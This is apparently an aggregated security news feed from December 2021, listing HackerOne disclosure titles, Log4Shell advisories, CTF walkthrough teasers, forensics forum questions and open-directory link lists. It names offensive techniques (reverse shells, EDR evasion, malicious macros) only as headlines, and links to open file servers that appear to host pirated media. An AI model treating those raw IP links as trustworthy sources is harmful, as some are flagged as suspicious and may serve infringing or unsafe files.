    Untitled
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/584582 - Bounty: $500
    reflected xss in e.mail.ru
    Mail.ru disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1379297 - Bounty: $1000
  • Open

    A collection of gifs
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-15 Review
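    Complete course videos for "Software Analysis" by ourren. The dilemmas and blind spots of engineering asset risk operations, as seen through the Log4Shell incident by ourren. For more of the latest articles, visit SecWiki  ( 2 min )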
  • Open

    Intro to Bitcoin investigation and wallet seizure - types of wallets, seeds, keys, and transactions
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    A TL;DR technical explanation of the log4j vulnerability
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
  • Open

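    [Security Advisory] Microsoft's December Patch Tuesday fixes multiple high-severity vulnerabilities
    Microsoft recently released its December security patches, fixing a total of 67 CVE vulnerabilities in Microsoft products, of which 7 are critical and 60 are high severity. Affected products include Windows and Windows components, ASP.NET Core and Vis...  ( 2 min )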

  • Open

    CISA Log4j (CVE-2021-44228) Vulnerability Guidance
    Article URL: https://github.com/cisagov/log4j-affected-db Comments URL: https://news.ycombinator.com/item?id=29559856 Points: 24 # Comments: 0  ( 2 min )
    CVE in Apache Log4j 2.15.0 was incomplete in certain non-default configurations
    Article URL: https://www.cve.org/CVERecord?id=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29558106 Points: 2 # Comments: 0
    Separate Log4j DOS Vulnerability – CVE-2021-45046
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29556414 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-4102: RCE in Chromium actively being exploited
    Article URL: https://security.archlinux.org/CVE-2021-4102 Comments URL: https://news.ycombinator.com/item?id=29555514 Points: 9 # Comments: 0
    CVE-2021-45046: Apache Log4j2 2.16.0 is out
    Article URL: https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f Comments URL: https://news.ycombinator.com/item?id=29554725 Points: 10 # Comments: 1
  • Open

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Levels of Fuzzing (2013)
    Article URL: https://blog.regehr.org/archives/1039 Comments URL: https://news.ycombinator.com/item?id=29556976 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Tips for DFIR Analysts, pt VI
    Context & Finding Persistence I was looking into an unusual mechanism for launching applications recently, and that research brought back a recurring issue I've seen time and again in the industry, specifically pivoting from one data point to another based on knowledge of the underlying system. Very often, during SOC monitoring or live response, we'll find a process executing via EDR telemetry (or some other means) and have no clear understanding of the mechanism that launched that process. Sometimes, we may have the data available to assist us in discovering the root cause of the process launch; for example, in the case of processes launched via web shell, all you need to do is trace backward through the process tree until you get to the web server process (i.e., w3wp.exe, etc.). Other ti…  ( 6 min )
  • Open

    Any good tools for forensic analyzing a MariaDB?
    Dear community, What would you use to analyze a MariaDB forensically? I found https://github.com/pr4xx/db-forensic-framework on GitHub but would like to hear what you are using? Anything helps, thank you submitted by /u/Civil-Lion-4602 [link] [comments]  ( 1 min )
    I'm currently studying to transition from a SIEM administrator to a network forensics analyst. What's are good workflows/resources for analyzing PCAPs?
    Hey community, 24 years old SIEM administrator who's currently self-studying to become a network forensics analyst. I'm reading books/watching youtube videos/doing some SANS and Chris Sanders courses but I want to hear from the subreddit - what's a good workflow or some tips when starting to analyze PCAPS? I have a lab with Brim, Suricata, and Snort that I play with. Assuming I'm tasked with analyzing a PCAP that is related to an incident of some sort, what would be good pointers and procedures to follow? what would be things that I would want to look for, and how do I find them? Thanks in advance! submitted by /u/HeliosHype [link] [comments]  ( 2 min )
    Are books in the FAQ still relevant?
    Some of them are from 2009 to 2013. Can anyone suggest more recent books? Or are those books still the best? Also what CTF website do you recommend specified for digital forensics ? submitted by /u/NinjaShmurtle [link] [comments]  ( 2 min )
    Recommendations for Targeted Diff Searches
    I’m looking to cross reference forensic data dumps from two different devices. Are there any tools (preferably open source) that can compare file contents between two different folders and print matching values? submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-14 Review
    A brief discussion of passive IAST products and their technical implementation by ourren. For more of the latest articles, visit SecWiki
  • Open

    Gaining access to a network with Office macros — Pentesting and red teaming
    Explaining the usage of malicious Office macros to gain access to a target’s network as a red teamer. Continue reading on Medium »  ( 3 min )
  • Open

    Am I getting ghosted by MITRE ?
    Hello there, I sent a request for some CVEs last week (on Thursday) to MITRE - CNA, for some bugs that I found in an open-source project, the bugs have been acknowledged by the vendor and patched. It's Tuesday today and aside from the automated email right after the request they didn't come back to me. Is this normal? Does it usually take that long? submitted by /u/Glum_Gur2093 [link] [comments]  ( 1 min )
  • Open

    Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read
    Aiven Ltd disclosed a bug submitted by j0v: https://hackerone.com/reports/1415820 - Bounty: $1000
    Universal Cross-Site Scripting vulnerability
    Proctorio disclosed a bug submitted by sector7-nl: https://hackerone.com/reports/1326264
  • Open

    Audiobooks, podcasts & tutti quanti
    http://120.29.58.149:8888/Audiobooks/ http://51.198.90.160/resources/AudioBooks/ http://173.208.202.90:8080/audiobooks/Martin%2C%20George%20R.%20R.%20-%20A%20Clash%20of%20Kings http://27.32.91.221/Audiobooks/ (Movies, TV shows and music in other dirs) http://www.vicenet.org/book/Lifespan%20Why%20We%20Age%20-%20and%20Why%20We%20Don't%20Have%20To/ http://67.82.39.229:88/DandD/Audio/Chris%20Perkins%20DM/ (including D&D stuff) http://winnow.veeshanvault.org/files/Audio/ Podcasts: http://teknosophy.com/episodes/ German podcasts on OSS: http://159.69.132.234/ submitted by /u/krazybug [link] [comments]  ( 2 min )
    WikiLeaks - Can Anyone Confirm New Data Dumped Tonight?
    submitted by /u/Aphix [link] [comments]

  • Open

    [dubsmash] Username and password bruteforce
    Reddit disclosed a bug submitted by asce21: https://hackerone.com/reports/1165225 - Bounty: $100
    com.reddit.frontpage vulnerable to Task Hijacking (aka StrandHogg Attack)
    Reddit disclosed a bug submitted by nexus2k: https://hackerone.com/reports/1325649
    [dubsmash] Long String in 'shoutout' Parameter Leading Internal server Error on Popular hashtags , Community and User Profile
    Reddit disclosed a bug submitted by sandeep_rj49: https://hackerone.com/reports/1237428 - Bounty: $1000
    No Rate limit on change password leads to account takeover
    Reddit disclosed a bug submitted by dreamispossible: https://hackerone.com/reports/1165285
    Vulnerabilities in exported activity WebView
    Shipt disclosed a bug submitted by shell_c0de: https://hackerone.com/reports/414101 - Bounty: $350
    Error Page Content Spoofing or Text Injection
    Judge.me disclosed a bug submitted by tefa_: https://hackerone.com/reports/1421413
  • Open

    Through the years..Movies,TV, Software, etc...
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
    Christmas movies and other Christmas stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    The first list contains mostly PDF and EPUB files. The second is a list of questionable/unexplored/interesting directories.
    Plus an appreciation repost for this post about Calishot and the terabytes of data being hosted. Adding NSFW flare for the unexplored directories, and for the nature of https://ihatefeds.com ‘s content. PDFs: https://lira.epac.to/DOCS-TECH/Security/ https://lira.epac.to/DOCS-TECH/ https://www.miralishahidi.ir/resources/ https://www.kgay4all.com/seioqueseiporleroqueleio/ https://theswissbay.ch/pdf/ http://index-of.es http://s28.bitdl.ir/?C=N&O=A -(edit)-a lot of files with the same size and overall feels a bit sus. Proceed with extra caution. https://ihatefeds.com http://www.aetkin.com/files/Real%20Analysis%20Qual%20Study%20Questions/ http://mis.kp.ac.rw/admin/admin_panel/kp_lms/files/digital/ http://incompleteideas.net/book/ Questionable directories https://ebook-mecca.com/ebooks/?SA http://47.219.34.42:8081/Files/ -(edit)-I think he’s dead, Jim. https://docs.spring.io/spring-amqp/docs/ https://docs.jboss.org/weld/reference/ https://www.scons.org/doc/ https://www.unicode.org/Public/ https://www.unicode.org/Public/UCD/latest/charts/ https://ftp.rush.edu/users/molebio/ https://www.nsula.edu/documentprovider/docs/ https://spdf.gsfc.nasa.gov/pub/software/cdf/doc/ https://bannerwitcoff.com/wp-content/uploads/ https://www.uvm.edu/~swac/docs/ http://ftp.axis.com • https://www.orfeo-toolbox.org/packages/ci/CookBook/ Directory- https://www.orfeo-toolbox.org/packages/ci/ submitted by /u/Ok_Strawberry7053 [link] [comments]
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on Hack the Box platform. So let's get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Imaging Software
    What freeware beside Paladin do you use for imaging after booting? Any suggestions? submitted by /u/Civil_Structure_1033 [link] [comments]  ( 1 min )
    Diavol Ransomware
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )
  • Open

    Finding the log4j RCE With Fuzzing
    Article URL: https://www.code-intelligence.com/blog/java-fuzzing-log4j-rce Comments URL: https://news.ycombinator.com/item?id=29541779 Points: 1 # Comments: 1  ( 1 min )
  • Open

    SecWiki News 2021-12-13 Review
    SecWiki Weekly (Issue 406) by ourren. The in-the-wild spread of Log4Shell, as seen through a cryptomining trojan case by Avenger. For more of the latest articles, visit SecWiki
  • Open

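    [Security Advisory] Apache Log4j2 remote code execution vulnerability
    Recently, an Apache Log4j2 remote code execution vulnerability has surfaced online. Attackers can exploit it by crafting special data request packets, ultimately triggering remote code execution. Because the vulnerability's impact is extremely broad, all users are advised to...  ( 4 min )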
  • Open

    Can we find Log4Shell with Java Fuzzing? 🔥 (CVE-2021-44228 - Log4j RCE)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Monitoring events through the OSINT system to ensure the information security of the organization
    Today OSINT (Open Source Intelligence) term is used in different aspects. Continue reading on Medium »  ( 5 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    How to mint and trade your NFTs using X.XYZ
    x.xyz is a nearly zero-gas NFT trading platform; X runs on the Fantom network, so Continue reading on Medium »  ( 2 min )

  • Open

    HackMyVM — Furious
    Writeup (Español) Continue reading on Medium »  ( 3 min )
  • Open

    Finding a deleted file without having a file name
    tldr; need to find a file that may or may not have been on 3 separate windows PCs. only definitive info i have is the file itself, which is a pdf of a scanned document. file was deleted 2019 and removed from recycle bin. hey all not sure where to start here, hoping someone can point me in the right direction. ive got a pdf file of a scanned document. that is all i know about the file. not sure if the name would have been changed, if it was originally a .docx, nothing. my first question is how to find it if it isnt deleted? i opened it up in notepad, grabbed a unique string from the file and then searched using 'Everything' (voidtools) but it was hit or miss as to if it found it 2nd question is how to find it if it was deleted. the file dates back to 2019 and these computers are used on a daily basis, so im not very hopeful the data wouldnt have been overwritten by now. thanks in advance submitted by /u/mat7688 [link] [comments]  ( 2 min )
    Biggest dreams in the field?
    Something a little different. What do you hope to accomplish in your career? Opening up your own firm? New research? I am just curious. submitted by /u/FAlady [link] [comments]  ( 1 min )
    Mobile phone and MacOS forensic tools
    I’m going to be attending SANS DFIR netwars and I’m confident everywhere except smartphones and macOS. I know we’ll be given apple hfs/apfs and iOS and android acquisitions which I’m not sure how to even approach. So was wondering if anybody had some good resources on how to tackle them submitted by /u/KennethsFreq [link] [comments]  ( 1 min )
  • Open

    A galore of animated movies, series and anime to prepare your Christmas time in family
    http://109.120.203.163/lvm/animation%20and%20puppets/ http://185.141.213.228/Animation/ https://185.107.32.136/Animation/ http://tajmovie.ir/Animation/ https://dl1.zflix.ir/Animation/ https://dl3.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ https://dl1.fastmovie.ir/Movie/Animation/ https://dl5.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ http://46.4.39.111/--KIDS-SERIES/ Anime: http://75.86.210.23/archive/ANIMU/ http://neet.rehab/anime/ == https://149.28.180.59/anime/ http://51.158.151.61:8080/Animoos/ http://148.251.73.149/Anime&Manga/ http://149.28.180.59/anime/ http://149.28.180.59/anime/ http://509.rbx.abcvg.ovh/ submitted by /u/krazybug [link] [comments]  ( 4 min )
  • Open

    Exploit samAccountName spoofing with Kerberos
    submitted by /u/dmchell [link] [comments]
  • Open

    add class vulnerable Stored XSS
    Mail.ru disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1215179

  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    RXSS - http://macademy.mtnonline.com
    MTN Group disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/1091165
    Missing captcha and rate limit protection in help form
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1165223
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #1
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397601 - Bounty: $3000
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #2
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397602 - Bounty: $3000

  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post shows how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    What's Coming with Go 1.18?
    With Go version 1.18, planned for release in the first quarter of 2022, many new features await us. Continue reading on Medium »  ( 2 min )
  • Open

    Trivial RCE in log4j
    submitted by /u/dfv157 [link] [comments]
    Evasion Adventures
    submitted by /u/grandstream [link] [comments]
  • Open

    Looking for career advice
    Please remove this if it doesn't fit in with this sub, I'm asking here because this seems to be the most common place to discuss appsec. A little about myself: I'm currently working in a helpdesk role in Australia and have been practicing both offensive netsec and web application security/exploit dev for a little while. I like both netsec and appsec but netsec bores me a little bit and I really enjoy coding/learning about applications and exploiting them. The issue I'm having is that helpdesk work seems to line up nicely with network pentesting, and I don't have a degree or any development experience. But with that said I'd really enjoy doing application security as a career. Does anyone have any advice in regards to entering the application security world from a support role? Or would it be better for me to pursue network security and then try to switch to application security later? Also should I pursue any certs that might help? I've thought about OSWE in the future. Any advice would be great, and again if this post doesn't belong here I can delete. Thanks. submitted by /u/n3v327311 [link] [comments]  ( 2 min )

  • Open

    Endpoint without access control leads to order informations and status changes
    Azbuka Vkusa disclosed a bug submitted by cabelo: https://hackerone.com/reports/1050753 - Bounty: $1000
    Misconfiguration Certificate Authority Authorization Rule
    Sifchain disclosed a bug submitted by d4rk_r0s3: https://hackerone.com/reports/1186740
    Linux Desktop application "sifnoded" executable does not use Pie / no ASLR
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188633
    CORS (Cross-Origin Resource Sharing) origin validation failure
    Sifchain disclosed a bug submitted by 11holefinder: https://hackerone.com/reports/1192147
    Vulnerability : Email Spoofing
    Sifchain disclosed a bug submitted by tajammul: https://hackerone.com/reports/1180668
    No valid SPF record found
    Sifchain disclosed a bug submitted by tamilarasi11: https://hackerone.com/reports/1187001
    Username disclosure at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188662
    Design Issues at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188652
    No Rate Limit in email leads to huge Mass mailings
    Sifchain disclosed a bug submitted by sudhakarsurya: https://hackerone.com/reports/1185903
    Information Disclosure at one of your subdomain
    Sifchain disclosed a bug submitted by omemishra: https://hackerone.com/reports/1195423
    Sifchain Privacy Policy Webpage Uses Wordpress Default Template. Does Not Display Correct Privacy Policy.
    Sifchain disclosed a bug submitted by masq31: https://hackerone.com/reports/1196049
    Clickjacking /framing on sensitive Subdomain
    Sifchain disclosed a bug submitted by ilxax1: https://hackerone.com/reports/1195209
    No Valid SPF Records at sifchain.finance
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188725
    Session Token in URL
    Sifchain disclosed a bug submitted by little_one: https://hackerone.com/reports/1197078
    CSRF in newsletter form
    Sifchain disclosed a bug submitted by ph0b0s: https://hackerone.com/reports/1190705
    Wrong Implementation of Url in https://docs.sifchain.finance/
    Sifchain disclosed a bug submitted by sar00n: https://hackerone.com/reports/1198877
    Wrong Url in Main page of sifchain.finance
    Sifchain disclosed a bug submitted by beebeek: https://hackerone.com/reports/1195512
    Clickjacking at sifchain.finance
    Sifchain disclosed a bug submitted by manjithgowthaman: https://hackerone.com/reports/1212595
    clickjacking vulnerability
    Sifchain disclosed a bug submitted by sravani_1234: https://hackerone.com/reports/1199904
    Clickjacking
    Sifchain disclosed a bug submitted by v_t: https://hackerone.com/reports/1206138
    information disclosure
    Sifchain disclosed a bug submitted by virus26: https://hackerone.com/reports/1218784
    Possible Database Details stored in values.yaml
    Sifchain disclosed a bug submitted by sparta5537: https://hackerone.com/reports/1199803
    Sifchain token leak
    Sifchain disclosed a bug submitted by abdullah321: https://hackerone.com/reports/1188938
    ETHEREUM_PRIVATE_KEY leaked via github
    Sifchain disclosed a bug submitted by bugkillerak: https://hackerone.com/reports/1283605
    4 xss vulnerability dom based cwe 79 ; wordpress bootstrap.min.js is vulnerable
    Sifchain disclosed a bug submitted by rao_ji1hackerone: https://hackerone.com/reports/1219002
    Signature Verification /// golang.org/x/crypto/ssh
    Sifchain disclosed a bug submitted by dpredrag: https://hackerone.com/reports/1276384
    Origin IP Disclosure Vulnerability
    Sifchain disclosed a bug submitted by uniquekamboj6738: https://hackerone.com/reports/1327443
    Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.
    Sifchain disclosed a bug submitted by 0xcachefl0w: https://hackerone.com/reports/1187816
    Email Spoofing bug
    Sifchain disclosed a bug submitted by niloychowdhury3: https://hackerone.com/reports/1176090
    [34.96.80.155] Server Logs Disclosure lead to Information Leakage
    Evernote disclosed a bug submitted by huntinex: https://hackerone.com/reports/1398270 - Bounty: $150
    Exposed kubernetes dashboard
    8x8 disclosed a bug submitted by bugkill3r: https://hackerone.com/reports/1418101

  • Open

    State of the Subreddit #3
    Greetings everyone in r/asknetsec, I hope everyone is doing well and getting ready for the holidays. All the moderators here wish you a relaxing and safe time with your families and friends. Hopefully we all will get a breather from the crazy world of Cyber Security and Networking. A couple of updates right off the bat – We’ve noticed an uptick in traffic for the subreddit over the past couple of months. Page views are up roughly 35% since the all-time lows of June-July when the subreddit was locked from the original admin. We are very happy with the increase, as it allows more collaboration and questions to be answered. Survey requests are no longer accepted on the subreddit going forward. We had a bit of a conversation internally on this topic as they seem to come up once or twice a week. Usually these are from college students requesting information for a class or study. We wish to continue and help anyone in school to best of our ability, but most of the time these surveys results are not shared publicly, and only benefit the survey creator. Due to this we don’t see it beneficial to include them. We’ve added surveys to rule 2 of what is relevant to the subreddit. Going into the new year, we hope to start providing everyone with some AMAs from verified industry professionals. We’ve been talking about this internally for a bit. State of the subreddit posts will most likely continue once every quarter (3 months). Thanks to everyone for continuing to contribute to the subreddit and continuing to report posts that break the rules. Even if you are unsure, your reports are appreciated. Have a fantastic holiday, and if you need anything, don’t hesitate to reach out to us directly. -AskNetSec Mod Team submitted by /u/Envyforme [link] [comments]  ( 1 min )
  • Open

    Process Ghosting - EDR Evasion
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    FIN13: A Cybercriminal Threat Actor Focused on Mexico
    submitted by /u/dmchell [link] [comments]
    Multiple Vulnerabilities in AWS and Other Major Cloud Services
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    [Transportation Management Services Solution 2.0] Improper authorization at tmss.gsa.gov leads to data exposure of all registered users
    U.S. General Services Administration disclosed a bug submitted by alexandrio: https://hackerone.com/reports/1175980
    php info file and sql backup at vendor's subdomain
    Semrush disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1358249 - Bounty: $200
    Account Takeover through registration to the same email address
    QIWI disclosed a bug submitted by avolume: https://hackerone.com/reports/1224008 - Bounty: $100
    [allods.mail.ru] - WebCache Poisoning Host Header lead to Potential Stored XSS
    Mail.ru disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1262408

  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    CORS origin validation failure
    UPchieve disclosed a bug submitted by jupiter-47: https://hackerone.com/reports/1404986
    Authentication Bypass - Email Verification code bypass in account registration process.
    UPchieve disclosed a bug submitted by anas_44: https://hackerone.com/reports/1406471
    Bypass a fix for report #708013
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1363672 - Bounty: $3500
    Guard WKS lookup: Evil WKS server forces connections to last forever
    Open-Xchange disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1016691 - Bounty: $444
    Blind XSS
    Rocket.Chat disclosed a bug submitted by cyberasset: https://hackerone.com/reports/1091118
  • Open

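    [Security Advisory] Grafana unauthenticated arbitrary file read 0-day vulnerability
    Recently, a 0-day vulnerability allowing unauthenticated arbitrary file read in Grafana has appeared online; details of the vulnerability have not yet been made public. An attacker can use it to read arbitrary files on the host without authentication.  ( 1 min )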
  • Open

    WHY fuzzers MISSED this buffer-overflow in Mozilla NSS library? 🤦‍♂️ (CVE-2021-43527 explained)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Suspected Russian Activity Targeting Government and Business Entities Around the Globe
    submitted by /u/dmchell [link] [comments]
  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion
    Evernote disclosed a bug submitted by neolexsecurity: https://hackerone.com/reports/1189367 - Bounty: $5000
    IDOR to view order information of users and personal information
    Affirm disclosed a bug submitted by xfiltrer: https://hackerone.com/reports/1323406 - Bounty: $500
    xss is triggered on your web
    Shopify disclosed a bug submitted by jaka_tingkir: https://hackerone.com/reports/1121900 - Bounty: $2900
    [h1-2102] Wholesale - CSRF to Generate Invitation Token for a Customer and Move Customer to Invited Status
    Shopify disclosed a bug submitted by rhynorater: https://hackerone.com/reports/1091209 - Bounty: $500
  • Open

    Detection and Response for Linux Reflective Code Loading Malware— This is How
    submitted by /u/elixirelixir [link] [comments]
    Reflective Code Loading in Linux — A New Defense Evasion Technique in MITRE ATT&CK v10
    submitted by /u/elixirelixir [link] [comments]
  • Open

    How is timeless debugging ( reverse debugging ) good? Insight needed
    Any statistical data would be really appreciated. Thanks in advance. submitted by /u/h3ll0-fr13nd [link] [comments]  ( 1 min )

  • Open

    Invoke-PSImage PowerShell Class Project
    A partner and I are in charge of creating a class exercise to show examples of steganography and potential malware. With some research, we discovered Invoke-PSImage on GitHub (GitHub Link). We want to just show how to first input a secret message via steganography with PowerShell and then show how you can input "safe" malware like opening a youtube link from opening the image. So far it isn't working and online tutorials haven't been much help. Does anyone have any experience with this module or know of any other tools that we could use? It is also due tonight 😂 submitted by /u/zacattac1 [link] [comments]  ( 1 min )
  • Open

    Recaptcha Secret key Leaked
    Paragon Initiative Enterprises disclosed a bug submitted by kashifinfo90: https://hackerone.com/reports/1416665
    Authenticated kubernetes principal with restricted permissions can retrieve ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by libio: https://hackerone.com/reports/1249583 - Bounty: $2500
    Staff can use BULK_OPERATIONS_FINISH webhook topic using Graphql without permissions all
    Shopify disclosed a bug submitted by yinvi777: https://hackerone.com/reports/1350095 - Bounty: $600
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )

  • Open

    reflected xss on the path m.tiktok.com
    TikTok disclosed a bug submitted by semsem123: https://hackerone.com/reports/1394440 - Bounty: $1000
    IDOR the ability to view support tickets of any user on seller platform
    TikTok disclosed a bug submitted by lewaperbb: https://hackerone.com/reports/1392630 - Bounty: $2500
    [h1-2102] [Yaworski's Broskis] Suspected overcharge and chargebacks in PoS
    Shopify disclosed a bug submitted by c0rv4x: https://hackerone.com/reports/1089978 - Bounty: $500
    access to stack memory beyond array boundaries
    Open-Xchange disclosed a bug submitted by ihsinme: https://hackerone.com/reports/796555 - Bounty: $400
    File System Monitoring Queue Overflow
    ownCloud disclosed a bug submitted by ihsinme: https://hackerone.com/reports/881891
    Ability to add address without being an admin or staff in the store via wholesale store
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1279322 - Bounty: $500
    Unathorised access to admin endpoint on plus-website-staging5.shopifycloud.com
    Shopify disclosed a bug submitted by j0j0: https://hackerone.com/reports/1394982 - Bounty: $2900
  • Open

    Dynamic instrumentation of a C binary
    I am (a Frida noob) trying to write a script for Frida to capture and modify variables inside a C function. The code for my binary looks like this:
        int myfunc(int dummy) {
            return --dummy;
        }
        int main () {
            ...
            printf("%d\n", myfunc(15));
            return 0;
        }
    My javascript looks like this:
        var myfunc_ptr = Module.findExportByName(null, "myfunc")
        Interceptor.attach(myfunc_ptr, {
            onEnter: function(args) {
                const source_string = args[0].readUtf8String();
                console.log(source_string);
                args[0].writeUtf8String("999");
            },
            onLeave: function(retval) {
                // by now do nothing.
            }
        })
    But it fails to update the value. Any help is appreciated ! :) submitted by /u/www_devharsh_me [link] [comments]  ( 1 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    XMGoat - An Open Source Pentesting Tool for Azure - XM Cyber
    submitted by /u/dmchell [link] [comments]

  • Open

    Stored XSS in files.slack.com
    Slack disclosed a bug submitted by oskarsv: https://hackerone.com/reports/827606 - Bounty: $1000
    Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints
    Shopify disclosed a bug submitted by cthulhufhtagn: https://hackerone.com/reports/1115139 - Bounty: $500
    CSS injection via link tag whitelisted-domain bypass - https://www.glassdoor.com
    Glassdoor disclosed a bug submitted by zonduu: https://hackerone.com/reports/1250730 - Bounty: $100
    account takeover through password reset in url https://reklama.tochka.com/
    QIWI disclosed a bug submitted by anonymouus: https://hackerone.com/reports/1379842 - Bounty: $500
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F  ( 2 min )
  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo. READ MORE  ( 2 min )

  • Open

    Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
    submitted by /u/dmchell [link] [comments]
    Tracking a P2P network related to TA505
    submitted by /u/dmchell [link] [comments]
  • Open

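    [Security Advisory] Multiple high-severity vulnerabilities in HP multifunction printers (CVE-2021-3923...
    Recently, details of multiple high-severity vulnerabilities in HP multifunction printers (CVE-2021-39237 & CVE-2021-39238) were made public; HP had issued a security bulletin on November 1. Attackers can exploit these vulnerabilities to obtain sensitive information, carry out remote...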
  • Open

    Welley Christ is trending as the world’s perfect man and he needs a deal for a record label and…
    Making millions have been a problem for Welley Christ he needs a record label viral topic about Welley Christ trending topic about Welley… Continue reading on Medium »  ( 1 min )
  • Open

    Is passing data to a driver a collection of loads/Mov instructions?
    submitted by /u/WillyRaezer [link] [comments]
    Android touch input spoofing?
    How could I spoof the input to the touch screen on any app using regular code and not already root? submitted by /u/WillyRaezer [link] [comments]
  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10. READ MORE  ( 6 min )
  • Open

    Privilege Escalation leads to trash other users comment without having admin rights.
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1307943 - Bounty: $200
    Stored XSS on https://community.my.games/ (Add Post)
